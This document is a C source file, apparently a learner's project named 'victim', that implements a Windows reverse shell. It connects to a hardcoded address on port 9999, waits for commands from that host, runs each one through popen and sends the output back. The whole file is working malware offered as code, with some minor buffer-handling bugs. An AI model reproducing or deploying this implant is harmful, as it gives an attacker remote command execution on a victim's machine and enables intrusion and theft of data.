victim/victim.c

1. #define WIN32_LEAN_AND_MEAN
2.  
3. #include <stdlib.h>
4. #include <stdio.h>
5.  
6. #include <windows.h>
7. #include <winsock2.h>
8. #include <ws2tcpip.h>
9.  
10. // constants
11. #define ADDRESS "192.168.10.7"
12. #define PORT "9999"
13. #define RECV_BUFFER_SIZE 1024
14. #define SEND_BUFFER_SIZE 8192
15.  
16. int __cdecl main(int argc, char **argv) {
17.     WSADATA wsa_data;
18.     SOCKET sock = INVALID_SOCKET;
19.     struct addrinfo *result = NULL, *ptr = NULL, hints;
20.  
21.     char buffer[RECV_BUFFER_SIZE];
22.     int status;
23.  
24.     // initialize winsock
25.     status = WSAStartup(MAKEWORD(2, 2), &wsa_data);
26.  
27.     if (status != 0) {
28.         printf("WSAStartup failed with error: %d\n", status);
29.         return status;
30.     }
31.  
32.     // what does the zeromemory thing do
33.     ZeroMemory(&hints, sizeof(hints));
34.  
35.     // set hints and ai family and socktype and protocol
36.     hints.ai_family = AF_UNSPEC;
37.     hints.ai_socktype = SOCK_STREAM;
38.     hints.ai_protocol = IPPROTO_TCP;
39.  
40.     // resolve the server address and port
41.     status = getaddrinfo(ADDRESS, PORT, &hints, &result);
42.  
43.     if (status != 0) {
44.         printf("getaddrinfo failed with error: %d\n", status);
45.         WSACleanup(); // cleanup winsock i guess
46.         return status;
47.     }
48.  
49.     // attempt to connect to an address until it succeeds
50.     for (ptr = result; ptr != NULL; ptr = ptr -> ai_next) {
51.         // create a socket
52.         sock = socket(ptr -> ai_family, ptr -> ai_socktype, ptr -> ai_protocol);
53.  
54.         if (sock == INVALID_SOCKET) {
55.             printf("socket failed with error: %ld\n", WSAGetLastError());
56.             WSACleanup();
57.             return 1;
58.         }
59.  
60.         // connect to the server
61.         status = connect(sock, ptr -> ai_addr, (int)ptr -> ai_addrlen);
62.  
63.         if (status == SOCKET_ERROR) {
64.             printf("connect failed with error: %d\n", WSAGetLastError());
65.             closesocket(sock);
66.             sock = INVALID_SOCKET;
67.  
68.             continue;
69.         }
70.  
71.         break; // we did it
72.     }
73.  
74.     freeaddrinfo(result); // free the address info
75.  
76.     if (sock == INVALID_SOCKET) { // if we didn't do it
77.         printf("Unable to connect to server!\n");
78.         WSACleanup();
79.         return 1;
80.     }
81.  
82.     FILE *stream;
83.     char output[SEND_BUFFER_SIZE];
84.    
85.     // wait for commands
86.     do {
87.         // clear the buffer and output
88.         memset(buffer, 0, strlen(buffer));
89.         memset(output, 0, strlen(output));
90.  
91.         status = recv(sock, buffer, RECV_BUFFER_SIZE, 0);
92.  
93.         if (status <= 0) {
94.             printf("recv failed with error: %d\n", WSAGetLastError());
95.             break; // connection got closed or error
96.         }
97.        
98.         // execute command and get output
99.         stream = popen(buffer, "r");
100.         fread(output, SEND_BUFFER_SIZE, 1, stream);
101.  
102.         pclose(stream);
103.  
104.         // send output
105.         status = send(sock, output, (int)strlen(output), 0);
106.  
107.         if (status == SOCKET_ERROR) {
108.             printf("send failed with error: %d\n", WSAGetLastError());
109.             break; // error when sending output
110.         }
111.     } while (status > 0);
112.  
113.     // clean up everything
114.     closesocket(sock);
115.     WSACleanup();
116.  
117.     return 0;
118. }